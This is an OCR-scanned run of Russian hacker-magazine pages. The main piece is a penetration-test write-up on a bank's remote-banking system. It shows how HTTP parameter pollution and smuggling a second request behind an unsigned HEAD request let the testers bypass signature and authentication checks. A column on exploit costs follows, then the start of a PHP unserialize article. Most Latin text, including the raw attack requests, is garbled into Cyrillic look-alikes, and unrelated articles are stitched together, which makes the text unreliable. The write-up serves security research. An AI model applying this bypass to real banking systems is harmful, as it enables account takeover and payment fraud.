ПРЕДИСЛОВИЕ 

Как известно, существует три основных класса уязвимостей 
программного обеспечения: уязвимости проектирования, реа- 
лизации и эксплуатации. Последние достаточно просты сточки 
зрения исправления, первые же наиболее сложны. При этом 
уязвимости проектирования не только труднее фиксить, 
но и наиболее «хлебно» искать с точки зрения исследователя 
безопасности или хакера, потому что в этом случае можно полу- 
чить наиболее долгоживущую уязвимость и наибольшее число 
уязвимых инсталляций. 

Если обратиться к истории, то можно увидеть, что банки од- 
ними из первых стали использовать гражданскую криптогра- 
фию — шифрование, электронную цифровую подпись, крип- 
тографические протоколы и специализированную аппаратуру. 
Разработчики систем дистанционного банковского обслужи- 
вания {или просто ДБО), таких как онлайн-банки для физиче- 
ских лиц или банк-клиент для юридических лиц, как правило, 
неплохо знакомы с криптографией и умеют хорошо решать 
основные задачи в применении к банковским реалиям: обе- 
спечение безопасной передачи данных, обеспечение неот- 
казуемости банковских операций {то есть цифровой аналог 
собственноручной подписи) и аутентификацию, соответствие 
требованиям государственных регулирующих органов (регу- 
ляторов, в нашем случае — Банка России), защиту морально 
устаревших систем, которые нельзя оперативно обновить. Так 
что если такие системы аккуратно разработаны программи- 
стами, которые хорошо знают основы криптографии и умеют 
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Клиент 




Сервер 



Браузер 



Клиентская сторона 
туннеля 

Подписывает входящие 
запросы и кладёт всё 
в дополнительные 
заголовки запроса 





Криптосервер 

Проверяет подпись 
Если 0К, журналирует 
и передаёт серверу 
приложений 



Сервер приложений 
ДБО 

Доверяет специальным заголовкам 
от криптосервера, сопоставляет 
идентификатор сессии со значением 
из заголовка 



их применять, используют признанные алгоритмы с хорошо 
изученной криптостойкостью, то их сложно сломать, потому 
что в этом случае придется искать уязвимости, к примеру, 
в реализации ПЗА или научиться эффективно факторизовать 
числа... 

А вот и нет. Все так красиво и безопасно только на словах. 
Даже в военной сфере, авиации и прочих областях разработ- 
ки ПО, где надежность жизненно важна и где в процессы раз- 
работки интегрированы методы формальной верификации, 
в программах время от времени находят ошибки. Финансовые 
приложения существенно менее критичны в плане надежно- 
сти (от сбоя ДБО, скорее всего, никто не умрет), и формальная 
верификация - нечастый гость даже в процессах разработки 
современных финансовых приложений, не говоря уже о ста- 
рых системах, разработанных лет двадцать назад или еще 
раньше. 

Каждый банк, который хочет предоставлять доступ к финан- 
совым транзакциям через интернет, вынужден выбирать один 
из двух вариантов реализации: 

• использовать типовое решение одного из хорошо извест- 
ных на рынке вендоров, например ВЗЗ ( о я з у в. сот/ 

ел I) или ВіШ ( ц/\ллѵ.ЫШ.сот ). и «заточить» его под себя; 

* разработать самостоятельно (или заказать у стороннего 

разработчика) собственную систему. 

В первом случае банк получит в готовом виде всю требуе- 
мую регуляторами криптографическую обвязку. Второй вари- 
ант оставляет решение вопросов, связанных с криптой, в веде- 
нии самого банка. И в этом случае на сцену выходят, все в белом 
(то есть сертифицированные ФСБ), многочисленные крипто- 
графические средства и криптопровайдеры, предоставляющие 
свои услуги. 

О втором варианте как раз и пойдет сегодня речь. Мы рас- 
смотрим современные системы дистанционного банковского 
обслуживания, работающие поверх обычных интернет-со- 
единений (рис. 1). И предложим подход к поиску уязвимостей 
проектирования в этих финансовых приложениях, на примере 
клиент-банка одного из крупных европейских банков. Данный 
подход особенно актуален и интересен тем, что в России до- 
вольно много банковских приложений реализуют именно такую 
архитектуру ДБО. 

Забегая немного вперед, скажем: по нашему опыту, самая 
«вкусная» часть таких приложений — специализированный 
протокол взаимодействия компонентов между собой. Дей- 
ствительно, криптосервер должен передавать серверу при- 
ложений результаты проверки ЭЦП из запроса пользователя. 
Сервер приложений при этом должен доверять этим результа- 
там, так как сам не использует криптографические примитивы 
(в этом была вся идея!). Фактически методика взлома такой 
схемы состоит из обратной инженерии протокола взаимо- 
действия с тем, чтобы понять, как серверу приложений пере- 
дается результат валидации запроса пользователя, а потом 
научиться подделывать и передавать эти идентификационные 
данные. 

ПРЕДЛАГАЕМЫЙ ПОДХОД 

Для начала сделаем пару утверждений общего характера 
на уровне здравого смысла о процессе разработки приложе- 
ний в банковской сфере и оставим их без доказательства; они 
помогут нам в поиске уязвимостей проектирования. 



Рис 1 , Шифрование, 
обеспечение неот- 
казуе мости операций 
и аутентификация 
в ДБО 




1ѴАКЫЩС 

Информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



Рис 2 Трасса, со- 
бранная с помощью АРІ 
Мол йог 



Утверждение А: нельзя так просто взять и создать крипто- 
графический протокол уровня приложений с нуля. 

Когда разработчик пытается изобрести «на коленке» безопас- 
ный специализированный протокол с использованием крипто- 
графических примитивов без предварительных шагов типа раз- 
работки спецификации, формального доказательства свойств 
протокола, использования безопасного процесса разработки, 
у него, скорее всего, ничего не выйдет. 

Утверждение Б: нельзя так просто взять и реализовать 
НТТР-клиент или НТТР-сервер с нуля. 



Когда программист пытается создать свой новый клевый НТТР- 
клиент или НТТР-сервер, с блек-джеком и всеми теми фичами 
безопасности, которых ему так хочется, и при этом он не Соодіе 
или МісгозоТС в смысле бюджета, количества рабочей силы 
и плана выпуска продукции, у него, скорее всего, также ничего 
не выйдет. А теперь представим, что мы имеем дело с резуль- 
татами обоих утверждений в одном месте. Это означает кучу 
сделанных «на коленке» парсеров, поверх которых работает 
прикладной протокол, «защищенный» криптографическими 
примитивами. Все это дает высокую вероятность появления 
уязвимости после интеграции всех частей в единое решение. 
Что касается любого нарушителя, то изначально он уже будет 
обладать следующими возможностями: 

* заходить в систему в качестве легитимного пользователя 
(мы всегда можем стать клиентом атакуемого банка — на- 
пример взяв у него кредит :)); 

* иметь полный доступ к клиентскому ПО (и аппаратуре), 
что позволяет осуществлять обратную инженерию про- 
извольного «толстого» клиента и протокола, по которому 
он обменивается данными с сервером, мониторить работу 
с аппаратными ключами и так далее. 

Чтобы определиться с условиями, под успешным хаком 
ДБО будем понимать получение доступа к счетам других кли- 
ентов с возможностью генерировать запросы на выполнение 
платежей от их имени, которые корректно проводятся серве- 
ром. Мы планируем сделать это, обойдя проверки ЭЦП за счет 
использования различий в обработке протокола НТТР элемен- 
тами многозвенной архитектуры банковского решения. Но пре- 
жде необходимо детально изучить «пациента». Три основных 
шага обратной инженерии ДБО, которые помогут нам спра- 
виться с задачей, включают в себя: 

* ре версии г деталей реализации клиента; 

* фингерпринтинг серверной части; 

* реверсинг и анализ протокола взаимодействия. 

Основной задачей первого шага является реверсинг крип- 
тографического протокола, реализованного на клиентской 
стороне криптосистемы. Криптосистему можно представить 
черным ящиком, который внедряется между браузером поль- 
зователя и сервером приложений и делает следующее: 

1. Устанавливает шифрованный туннель (331_/Т1_3 или специ- 
ализированный ѴРМ — без разницы). 

2. Подписывает каждый исходящий НТТР-запрос на клиенте. 
Эта часть может быть реализована (и часто так и делают) 
как веб- прокси, который слушает на локальном порту кли- 
ента. 
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* Как криптосервер обрабатывает дублирующиеся заголов- 
ки? Какое значение будет использовано: первое или по- 
следнее? 

• Какие символы используются для разделения заголовков 
(СВІ_Р, СВ или что-то еще)? 

Цель этого этапа - обнаружить различия в обработке НТТР 
на стороне криптосервера, где выполняются проверки подпи- 
си, и на сервере приложений, где выполняется непосредствен- 
но обработка запроса, используя которые мы могли бы реали- 
зовать идею атаки вида ХМІ_ зідпаіиге ѵѵгарріпд аНаск, только 
для НТТР, при помощи все тех же известных методов: ргоіосоі 
зтиддііпд и рагатеіег роііиііоп (в примере ниже ты увидишь, 
как конкретно это работает на реальном приложении). 

АНАЛ ИЗ СЕРВЕРА НТТР 



3. Проверяет целостность и аутентичность НТТР-запросов, по- 
кидающих туннель на серверной стороне криптосистемы. 

4. Передает проверенные запросы серверу приложений, к ко- 
торым прикрепляет метаданные, содержащие идентифи- 
катор пользователя и результаты криптографической обра- 
ботки запроса («Все ОК», «Ключ устарел» и так далее). 

Реверси нг крипто прото кола на стороне клиента — ■ не выс- 
шая математика, достаточно воспользоваться АРІ-монитором 
и любимым отладчиком и с их помощью получить ответы 
на следующие вопросы: 

1 . Какой НТТР-клиент (и парсер) используется на стороне кли- 
ента (ѴѴіпсІоѵѵз АРІ, Заѵа НТТР СІіепі, ...)? 

2. Какие элементы СЕТ-запроса подписываются ЭЦП? Весь 
запрос или только II ВІ_? Какие запросы поддерживаются: 
РОЗТ, СЕТ, НЕАЭ, ТВАСЕ? 

3. Какие элементы подписываются у РО$Т-запроса? Весь за- 
прос, только тело или тело и 1)ВІ_? 

4. Какая служебная информация передается с запросом? 
Как передается ЭЦП? Как передается идентификатор клю- 
ча? Например, это могут быть кастомные заголовки, такие 
как Х-СІіепі-Кеу-Ісі. 

После этого можно переходить к изучению функционально- 
сти криптосервера. Здесь предстоит сделать несколько вещей: 
проанализировать особенности парсера НТТР на криптосерве- 
ре, проанализировать сам веб-сервер криптосервера и, нако- 
нец, проанализировать взаимодействие криптосервера и сер- 
вера приложений. 

АНАЛИЗ НТТР-ПАРСЕРА КРИПТОСЕРВЕРА 

Основные проверки, которым следует подвергнуть крипто- 
сервер, представляют собой следующий список: 

• Как НТТР-парсер криптосервера обрабатывает дубли- 
рующиеся имена параметров в ОЕТ- и РОЗТ-запросах? 
Какое значение будет использовано: первое или послед- 
нее? И что насчет одинакового имени параметра в ІІВІ_ 
РОЗТ-запроса и в его теле (да-да, речь о НТТР Рагаплеіег 
РоІІЩіоп)? 



Следующий этап анализа позволит выяснить детали обработки 

протокола НТТР на сервере. Здесь нам нужны ответы на следу- 
ющие вопросы: 

* Какие версии протокола НТТР поддерживаются? Поддер- 
живается ли НТТР/0.9? 

* Поддерживаются ли множественные НТТР-запросы через 
одно соединение? 

* Как криптосервер обрабатывает некорректные или дубли- 
рующиеся заголовки СопіегѵМ_епдіИ? 

■ Какие НТТР-методы разрешены? 

* Поддерживает ли криптосервер тиііірагі-запросы или 
чанки? 



Рис В буфере мы ви- 

дим структуру запроса 
от клиента, добавлены 
специальные заголов- 
ки к запросу 

Рис 4 ...икакаяинфор 
мация подписывается 
ЭЦП — Рогтсіаіа 



АНАЛИЗ ПРОТОКОЛА ВЗАИМОДЕЙСТВИЯ 

Напомним, мы бы хотели уметь форджить осмысленные за- 
просы, которые будут обрабатываться сервером приложений 
как доверенные. Наиболее очевидный и простой способ пере- 
дачи метаданных от криптосервера к серверу приложений — 
через НТТР-заголовки, добавляемые к запросам клиента. Соот- 
ветственно, знание «секретных» управляющих заголовков может 
предоставить тебе полную власть в банковских приложениях. 

Действительно, криптосервер должен каким-то образом 
передавать серверу приложений идентифицирующую инфор- 
мацию о пользователе, который сделал запрос. Грубо говоря, 
криптосерверу нужно вместо вороха пришедшей к нему ме- 
таинформации, являющейся продуктом криптографических 
преобразований, передать серверу приложений просто иден- 
тификатор пользователя, который сделал запрос. Сервер при- 
ложений же должен доверять полученной информации. Это 
свойство (то есть протокол взаимодействия между криптосер- 
вером и сервером приложений, который отделен от криптогра- 
фических примитивов) становится неотъемлемой частью архи- 
тектуры, когда разработчики решают использовать в качестве 
фронтенда стороннее криптографическое решение. 

Все это хорошо, но как мы узнаем названия этих управляю- 
щих заголовков? Тут доступны следующие варианты: 

- угадать/сбрутфорсить; 

* прочитать документацию на криптосервер; есть надеж- 
да, что названия управляющих заголовков не поменялись 
в установленной версии; 

• атака методом социальной инженерии на разработчиков 
криптографического решения; можно притвориться заказ- 
чиком и спросить, как будет их криптосервер передавать 
результаты проверки запросов твоему бэкенду; 

• прочитать заголовки в ответе от самого приложения (см. от- 
ладочные интерфейсы, подробные сообщения об ошибках, 
метод ТВАСЕ); 

* обратная инженерия криптоклиента или криптографических 
библиотек; возможна ситуация, когда метаданные, присое- 
диненные к исходящим запросам на стороне клиента, будут 
только валидироваться криптосервером, но никак не изме- 
няться. Действительно, зачем менять клевые названия за- 
головков? 



Криптосервер должен каким-то обрі 
передавать серверу приложений идеи 
цирующую информацию о пользоват 
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зідпаіиге: 



7А02393Р1263С23Е25Р2О21Е7АА7СВ07114491А72750С 



пате=соттоп-ѵа1 ие 





ПРИМЕР ВЗЛОМА 

Ну а теперь, собственно, о самом интересном. Все началось 
как обычно. Большой европейский банк с филиалом в России 
попросил проанализировать безопасность их ДБО, защищен- 
ного криптоалгоритмами семейства ГОСТ. Почти сразу после 
началаанализа мы нашли несколько типовых веб-уязвимостей, 
которые позволяли, например, получать список всех пользова- 
телей и менять им пароли. Плюс обнаружили отладочный ин- 
терфейс, который распечатывал полностью НТТР-запрос, по- 
лученный веб-приложением (так что с именами управляющих 
заголовков мы разобрались довольно быстро). 

К сожалению, критичность этих уязвимостей оказалась су- 
щественно ниже привычной из-за криптографический защиты: 
даже зная логин и пароль, мы не могли залогиниться в систему 
без соответствующей ключевой пары. Кроме того, клиентская 
часть криптосистемы удаляла все управляющие заголовки 
из пользовательских запросов, таким образом запрещая нам 
манипулировать ими напрямую. 

Сам клиент представлял собой прокси уровня приложе- 
ний, работающий на стороне пользователя между браузером 
и криптосервером. Пристальный взгляд на клиентскую часть 
позволил выявить криптографические примитивы, реализо- 
ванные в поставляемых вместе с клиентом разделяемых библи- 
отеках, и с помощью АРІ Мопііог нам удалось установить хуки 
на вызовы АРІ, проанализировать полученные трассы и выта- 
щить оттуда нужную информацию. 

Изучение буфера с пользовательскими данными раскрыло 
структуру запроса от клиента, в частности, в него были добав- 
лены специальные заголовки СегІіТіса1е_питЬег, Рогт сіаіа, 
Бідпа'іиге (рис. 3), а также было видно, какие данные из запроса 
подписывались с помощью ЭЦП (рис. 4). 

Для нас наиболее интересен тут заголовок СегШіса*е_ 
пиплЬег, который, очевидно, содержит идентификатор ключа 
клиента, а также заголовки Рогт сіаіа и Зідпаіиге, которые со- 
держат параметры запроса (в данном случае строку запроса) 
и ЭЦП соответственно. 

В результате клиентский запрос, который в оригинале вы- 
глядит так: 

С ЕТ / 1одіп?пате=ѵа1ие НТТР/1.1 
Нозі: 1Ѳ.6.28.19 



после обработки криптоклиентом становится таким: 

СЕТ /1одіп?пате=ѵа1ие НТТР/1.1 
Н05І: 10,6.28.19 
Сег1і6са1е_питЬег : Ы5г849 
Рогт_сІа1а: пате=ѵа1ие 

Біепафиге : _6В8А57АЗЕА9С25077СѲ1Р4Е957Р5752С69Р61^ 
О3451Е87ОР18046С51ОС9А9АО63С7718708159В7ЕСР5РС8Е^ 
РР4424Р813РВ65ЕР5Е2Р21Р2Р389ЕѲ3319СА25Р7Ѳ03 



Играясь с методами и параметрами запросов, мы заметили, 
что прокси подписывает только строку запроса в случае ОЕТ- 
запросов и только тело в случае РОЗТ-запросов. Стало понят- 
но, что криптосервер для каждого запроса выполняет пример- 
но такое предписание: 



Рис Как запрос 

Р05Т выглядит после 
прохождения крип- 
топрокси: подписано 
только значение из 
тела запроса, при этом 
значение из строки 
запроса осталось неиз- 
менным 

Рис * Итоговый век- 
тор атаки на механизм 
обеспечения неотказу - 
емости — атакующее 
значение передаем 
в строке запроса, 
а в теле оставляем до- 
веренные значения 



Рис Обычный запрос 
на авторизацию 



1 * Проверить, что заголовок Рогтсіаіа отражает строку запро- 
са или тело, в зависимости от типа запроса, 

2. Проверить, что значение заголовка СегІіІісаІепитЬег ука- 
зывает на того же пользователя, который устанавливал без- 
опасное соединение с помощью своего сертификата. 

3, Проверить, что заголовок Зідпаіиге содержит коррект- 
ную подпись заголовка Рогтсіаіа, используя Ю ключа 
из СегІіІісаІепитЬег, 

Выглядит солидно, не так ли? 

ОБХОД МЕХАНИЗМАОБЕСПЕЧЕНИЯ 
Н ЕОТК АЗУ ЕМОСТИ ОП ЕРАЦИ Й 

Что ж, сначала мы посвятили немного времени анализу и фин- 
герпринтингу, И вот что мы нашли: 

1 . Прокси на стороне клиента не добавлял заголовки Рогт_сІаІа 
и Зідпаіиге к запросам НЕАО, они передавались без подпи- 
си и каких-либо проверок, клиентская часть только добавля- 
ла номер сертификата клиента. 

2. Прокси на стороне клиента не учитывал, что Р08Т- 
запросы могут содержать не только параметры в теле 
запроса, но и строку запроса. Для РОЗТ-запросов подпи- 
сывались только параметры из тела, а строка запроса пе- 
редавалась серверу приложений без изменений. Теперь 
можно было попробовать НТТР рагапчеіег роііиііоп (НРР) 
и передавать параметры с одним и тем же именем в теле 
и в строке запроса. Что и было сделано. В результате мы 
обнаружили, что криптопрокси подписывает только пара- 
метры в теле запроса и передает строку запроса без из- 
менений, криптосервер также проверяет подпись только 
для тела (см, заголовки Роггл сіаіа и Зідпаіиге на рис. 5) 
и передает строку запроса серверу приложений в неиз- 
менном виде. 

Убедившись, что сервер приложений отдает предпочтение 
параметрам, получаемым в строке запроса, а не в теле, мы 
смогли обойти механизм обеспечения неотказуемости при по- 
мощи такого вектора: нужные нам значения параметров запро- 
са ставим в строку запроса, а в теле оставляем те значения, 
которым криптопрокси будет доверять. При этом, как ты пом- 
нишь, сервер приложений первым делом смотрит в строку за- 
проса, а значит, мы удачно обошли все проверки, и при этом 
незаметно для всех компонентов системы. 
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Нормальные герои всегда идут в обход! 
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НЕ АО 

Ьіір: //10. 6. 28. 19/1 оді п?змате 
&5Разз=ѵа1 і сі . 21 нттр/1.1 
Нобі: 10.6.28.19 
Соппестіоп: кеер-аііѵе 
сопіепТ-і_епдтІі : 10 



р=попетрі:уЬосІу 

Р05Т Ні:ір://10.б.28. 19/1 оді п НТТР/1.1 
Н05Т: 10.6.28.19 

сотепТ-Туре : аррі і сатіоп/х-т/ѵѵ-Тогт- 

игі епсосіесі 

СоптепТ-ЕепдтН : 36 

Сет' Гі саіе_питЬег : 0x717 

5Мате=772965163б60&5Ра55=ѵа1 і сі . 60 







Браузер 



НЕАО 

Нттр://10.6. 28. 19/1 оді п?: 
ѵаіісі.21 НТТР/1.1 
Но$Т: 10.6.28.19 
СоппесТіоп : кеер-аііѵе 
соптепт^і_епдтЬ : 10 
Сегті ’Рісаіе. питЬе г : 0х84< 



5Мате=7728С 
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ПѵЙДО 



р=попеігш1:ѵЬс 



РП^і 



Н051: 



СопТепг- 1 уре : аррпсатюп 
СопТеггс-іепдтН: 36 
сегті ТісаіепитЬег : 0x717 
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1 р . / / * о хо . хэ / 1 иу 



НТТР/1 



іптепт 



сап оп/х-іѵш-тогт-иг і епсосіесі 




2965163660&$Ра$5=ѵа1 і сі . 60 



ОБХОД АВТОРИЗАЦИ И 

Все это хорошо, только кого волнует эта неотказуемость, если 
механизмы аутентификации остаются неприступными? По- 
этому идем копать дальше. Напомним, что к этому моменту мы 
умеем просматривать список всех пользователей ДБО, менять 
им пароли и, кроме того, отправлять серверу приложений за- 
просы таким образом, что криптосервер считает их корректно 
подписанными, а сервер приложений использует параметры 
без подписи. 

Предположим, что мы хотим атаковать пользователя с иден- 
тификатором Ю=0х717 и уже установили ему новый пароль. Те- 
перь мы бы хотели залогиниться под ним. В обычной ситуации 
аутентификационный запрос выглядит как на рис. 7. 

С передачей этого запроса есть две проблемы: во- 
первых, прокси на стороне клиента удаляет все управля- 
ющие заголовки из запроса от браузера. В нашем случае 
будет удален заголовок СегІіііса1е_питЬег. С этим можно 
справиться, реализовав свой собственный криптоклиент, 
который связывается с криптосервером и передает все, 
что нам нужно, с правильными заголовками. Вторая пробле- 
ма заключается в том, что криптосервер сравнивает пара- 
метр СегШіса1:е_питЬег из заголовка, полученного в НТТР- 
запросе, с номером сертификата, который был использован 
для установки шифрованного туннеля. Вот в этом-то вся за- 
гвоздка. Чтобы продвинуться дальше, нужен был очередной 
трюк. И мы его нашли. 

Помнишь, мы научились отправлять НЕАР-запросы со стро- 
кой параметров без какой-либо подписи? Вдобавок к этому мы 
заметили, что каждый раз через одно ТСР-соединение крипто- 
клиент передает только один НТТР-запрос, после чего крипто- 
сервер разрывает соединение. 

И мы подумали: а что, если отправить два НТТР-запроса 
в одном ТСР-соединении один за другим? Оказалось, что крип- 
тосервер будет считать их одним большим НТТР- запросом. 
Бинго, ргоТосоІ зтиддііпд! 

Вот как криптоклиент обрабатывал два последовательных 
запроса, первый из которых — НЕДР: 

• клиент парсил их как одно НТТР-сообщение 
со строкой запроса, заголовками и телом; 

• удалял все управляющие заголовки из первого 
запроса (нуда, второй-то он считает телом первого); 

• добавлял корректный заголовок СегТііісаІепитЬег 
в первый запрос; 

• как было показано выше, он, без добавления заголовков 
Рогт_ба1:а или ЗідпаШге, отправляет НЕАР-запрос 

(с телом, без проверки) в криптотуннель. 

А вот как криптосервер обрабатывал полученные запросы: 

• он также считал их единым НТТР-сообщением; 

• сервер проверял значение заголовка СегШіса1:е_питЬег 
на совпадение с параметрами установленного 
криптотуннеля; 

• для НЕАР-запроса криптосервер не проверял 
отсутствующие заголовки Рогтсіаіа и ЗідпаШге, 

а сразу передавал результат серверу приложений, 
добавив к нему необходимые управляющие заголовки. 



' іл г 
гі Ь 



Криптоклиент 
и криптосервер счита- 
ют два последователь- 
ных НТТР-запроса в од- 
ном соединении одним 
большим запросом 






Итоговый вектор 
атаки на аутентифи- 
кацию 



Сервер приложений, в свою очередь, корректно обрабаты- 
вал полученные данные как два отдельных НТТР-запроса, при- 
чем обрабатывал оба. Вот так мы смогл и обойти авторизацию 
{см. рис. 8 и 9). Наиболее важной тут оказалась возможность 
передавать управляющие заголовки во втором запросе. Ведь 
второй запрос криптосистема считает телом первого, поэтому 
вообще его не обрабатывает. 

После того как два запроса (рис. 9) будут обработаны кли- 
ентской частью криптосистемы, у нас окажется два корректных 
НТТР-запроса, первый от имени нашего пользователя, а второй 
от имени произвольного пользователя системы. Шах и мат! 

ЗАКЛЮЧЕНИЕ 

В результате мы достигли возможности отправлять полно- 
стью доверенные запросы от имени «зловредного» клиента 
к серверу банка, как если бы они были сгенерированы ле- 
гитимным клиентом. Мы полагаем, что подобный подход 
к анализу систем «сверху вниз» можно использовать прак- 
тически для любой специализированной криптографической 
системы, потому что ключевое значение имеет человеческий 
фактор {в нашем случае это приняло форму неверного пред- 
ставления о современных протоколах уровня приложений, 
о сложных веб-фреймворках и их внутренней кухне). Кроме 
того, разобранный пример анализа ДБО может оказаться 
полезным для других исследователей защищенности про- 
граммных продуктов. 

В качестве послесловия процитируем слова Ади Шамира 
из его недавнего выступления на П5А Сопіегепсе 2013: «Я дей- 
ствительно верю, что значимость криптографии снижается. 
Даже самые защищенные компьютерные системы в самых 
физически изолированных местах успешно взламывались в по- 
следние пару лет в результате АРТ {АбѵапсесІ Регзізіепі ТІігеаі, 
целенаправленная атака на конкретную систему) и других про- 
двинутых атак». ИНИ 



ПОТОМУ НТО ничто 

НИКОГДА НЕ МЕНЯЕТСЯ... 

Если напрячь извилины, то можно вспомнить изрядное число недавних публика- 
ций и выступлений с похожими техниками обхода механизмов защиты: 

ХМ І_ ЗідпаШге ѴѴгарріпд; 

Оп Вгеакіпд ЗАМІ_: Ве ѴѴІіоеѵег Ѵои ѴѴапІ Ш Ве ( Ьіі.Іѵ/Піл/аОСк ): 

Апаіузіз оТ ЗідпаШге ѴѴгарріпд АПаскз апсі Соипіегтеазигез ( ІІІѵ/ІОНУРУУ ): 
СѴѴЕ-347: Ітргорег Ѵегііісаііоп оі СгурШдгарНіс ЗідпаШге и связанные с ней СѴЕ 

( Ьі1.1ѵ/12пЕсІХМ ): 

погугли по запросу «НРР Ьуразз ѴѴАР» — куча разных статей; 

СѴѴЕ-444: Іпсопзізіепі Іпіегргеіаііоп оі НТТР ВециезШ и связанные с ней СѴЕ 

( ЬІТ-Іѵ/1472Ѵ.ІТ ): 

ѴѴеЬ Арр Сгуріоіоду: А ЗШбу іп Раііиге ( -іі //ІЗиЫІЕ ): 

разное: небезопасные генераторы случайных чисел, некорректные реализа- 
ции РКІ как примеры некорректного использования криптографии. 
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КОЛОНКА 

АЛЕКСЕЯ 

СИНЦОВА 






Уже достаточно давно производители ОС пытаются помешать злобным хакерам 
эксплуатировать уязвимости в ПО. При этом многие из их поделок так или иначе 
взламываются и обходятся, что вызывает праведные крики вроде «Винда маз- 
дай», «Винде капец» (да-да, опять я на винде сфокусирован). Но если проследить 
эволюцию этих техник, как и атакующих техник, то можно обнаружить некую логи- 
ку и смысл всей этой гонки вооружения. 



ПРИЧИНА ВСЕГО -ДЕНЬГИ 

Давным-давно, в далекой-далекой... нет, постой, не так. Не- 
давно, каких-то 10-12 лет назад, эксплойты под нашу люби- 
мую винду были сущим адом. Были массовые черви, сервер- 
сайд эксплойты (ну то есть нацеленные на сервисы винды, 
а не на клиентское ПО типа офиса или браузера). Все это 
мило жило, процветало и добра наживало. Причина проста: 
достаточно найти уязвимость в любом ПО типа переполнения 
буфера или ошибки с указателем памяти — и ты можешь за- 
хватить контроль без особого труда и тайных познаний недр 
процессора и железа. Таким образом, надо понимать, что лю- 
бая атака имеет цену, которую складывают несколько состав- 
ляющих: 

• цена поиска уязвимости: 

• написание фаззера, 

• вычислительные мощности, 

• время; 

• цена написания эксплойта: 

• триггер уязвимости — перехват управления (ЕІР), 

• шелл-код. 

При этом оставим за скобками постэксплуатацию и боевую 
нагрузку: 



• бэкдор, 

• эксплойт гіпд 0, 

• руткит. 

В определенный момент создатели ОС и железа поняли, 
что надо как-то «усложнять задачу» этим мерзким парням, 
и началась гонка вооружения, которая идет до сих пор. РаХ, 
ЗіаскЗИІеІсі, РЕР, АЗІ_П, ЕМЕТ... Да много чего можно сейчас 
вспомнить. Плюс механизмы песочницы, которые нынче есть 
во многих клиентских приложениях, в частности в браузе- 
рах и читалках РОР. Они работают с определенной степенью 
эффективности. Теперь самое интересное: цель защиты — 
не предотвратить взлом полностью, а усложнить атаку так, 
чтобы цена атаки была выше, чем возможная прибыль. Да, 
взломать можно все, но какой ценой? Именно этот вопрос 
будет решающим в кибервойнах и защите от крупных кибер- 
атак. Защита должна стоить дешевле, чем орудие проникнове- 
ния, при этом использование и создание такого оружия будет 
очень дорого. В пределе цена должна стремиться к бесконеч- 
ности — это идеальная защита :}. 

В прошлом году представитель МісгозоИ: заявил, что цель 
создания всех этих ваших ЕМЕТ и прочих защитных метод 
и есть все вышесказанное: 
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Цена создания эксплойта 



1. Увеличение количества инвестиций, необходимых для по- 
иска опасных уязвимостей. 

2. Увеличение количества инвестиций, необходимых для на- 
писания функциональных и работоспособных эксплойтов. 

3. Сокращение возможности хакеров вернуть свои инвести- 
ции. 

К слову, большая часть «рынка эксплойтов» поддерживает- 
ся государственными организациями, и в этом есть некоторая 
ирония. Причем именно эти структуры накачивают рынок день- 
гами... То есть наиболее сложные и дорогие эксплойты именно 
там, у Большого Брата, и их количество неизвестно, но точно 
больше чем то, чем обладают киберпреступники. С другой сто- 
роны — мир эксплойтов не заканчивается на уровне ПО/ОС. 
Мы имеем процессоры, прошивки, смартфоны, и под все это 
дело создаются и покупаются боевой код и прочие решения 
«нападательного характера». Пентестеры и секурити-консуль- 
танты фактически плетутся сзади всей этой колонны, хотя так- 
же привносят вклад в развитие рынка. Что это значит для поль- 
зователей? Скорее всего — ничего. Вряд ли ЦРУ интересна 
ваша переписка ВКонтакте настолько, чтобы «тратить» экс- 
плойт стоимостью в сотню тысяч долларов. Простые защитные 
механизмы работают против «дешевых» атак, которые можно 



встретить на просторах интернета, от китайских, славянских 
и прочих производителей такого добра. Но и там накапливает- 
ся опыт и сложность атак растет, как, впрочем, и защитные тех- 
ники обрастают новыми плюшками с каждым новым релизом, 
будь то ОС, ПО браузера и так далее. 



Рис.1 

Так бы это было в да- 
леком 2001-м. Цена на 
создание эффективно 
го эксплойта 



ТАК И ЧТО? 

Можно не вдаваться в технические детали того, как работа- 
ют защитные механизмы или иные трюки. Так или иначе, су- 
ществуют техники обхода, а если не существуют, то не факт, 
что завтра их не обнаружат или что они не держатся в секре- 
те. Но это не значит, что можно на них забить и их игнориро- 
вать. В принципе, любой анализ последних атак, которые 
стали доступны в паблике, покажет вам, что банальный ЕМЕТ 
или песочница СНготе способна остановить большую часть 
этих нападений (да, всегда есть Заѵа, которая портит вообще 
любую защитную технику). Поэтому использование защи- 
ты хоть и не гарантирует ничего на 100%, но если ты знаешь, 
как она работает, какие атаки останавливает, как влияет на эф- 
фективность работы и что нынче происходит злого в интернете, 
то сможешь самостоятельно оценить риски и эффективность 
текущей защиты и даже вероятность событий и атак. Для этого 
даже не надо тратить миллионы на консультантов :). ДС 



Рис. 2 

С появлением за- 
щитных техник при той 
же цене эксплойт уже 
работать не будет 

Рис. 3 

Для обхода защитных 
техн и к придется дел ать 
более сложный и до- 
рогой эксплойт 

Рис. 4 

Примерные этапы 
создания боевого 
эксплойта в наши дни. 
Цена высока 
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Старый новый ип 



зепаііге 




Свежие способы 
эксплуатации 

РНР ОЪ]еЛ 

I піесііоп 



На дворе 2013 год, а уязвимость, 
связанная с преобразованием 
непроверенных сериализованных 
данных в представление РНР, 
она же ипзегіаііге-баг, все еще 
актуальна. Более того, проведенное 
мной исследование встроенных 
классов РНР показало, что возможны 
и новые, более универсальные 
способы эксплуатации, 
использующие уязвимости самого 
интерпретатора. 



РНРСШЕСТІѴиЕСТІОЫ 

В 2009 году небезызвестный Стефан Эссер на конферен- 
ции Ро\л/ег оТ Соттипііу в Сеуле выступил с исследовани- 
ем ЗІіоскіпд Меѵѵз іп РНР Ехріоііайоп, где, помимо прочего, 
выявил возможные сценарии атак, когда пользовательские 
данные попадают в функцию ипзегіаіі 2 е(}. Можно сказать, 
что именно тогда появился новый термин РНРОЬ{ес11п|ес1юп, 
обозначающий уязвимость, позволяющую внедрять произ- 
вольные объекты РНР в контекст веб-приложения. Уязви- 
мость позволяет проводить множество атак: от ХЗЗ до вы- 
полнения произвольного кода, в зависимости от структуры 
объектов уязвимого приложения. 






Х55 

50АР-нь 4 ,'ін иг» ат рЬр 



5 оарСІЕеп! генерирует 
исключение ^рарРаиІІ 



гаЬѳІ еггог Упсаидпі 
5 оарРаиІі ехсеріюп: ІН I ГРІ 
